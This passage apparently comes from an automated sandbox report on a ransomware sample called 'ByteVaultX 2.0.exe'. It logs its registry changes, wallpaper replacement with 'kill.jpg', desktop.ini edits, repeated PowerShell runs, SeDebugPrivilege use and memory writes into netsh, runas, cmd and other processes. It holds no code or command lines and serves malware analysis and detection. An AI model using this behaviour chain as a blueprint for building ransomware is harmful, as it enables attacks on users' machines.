Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4660 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 4660 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 1036 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 1036 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 1036 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 1036 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 1036 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1036 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1036 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 1036 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 2068 wrote to memory of 3868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2068 wrote to memory of 3868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2068 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2068 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2068 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2068 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2068 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2068 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2068 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 4352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 4352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 3560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
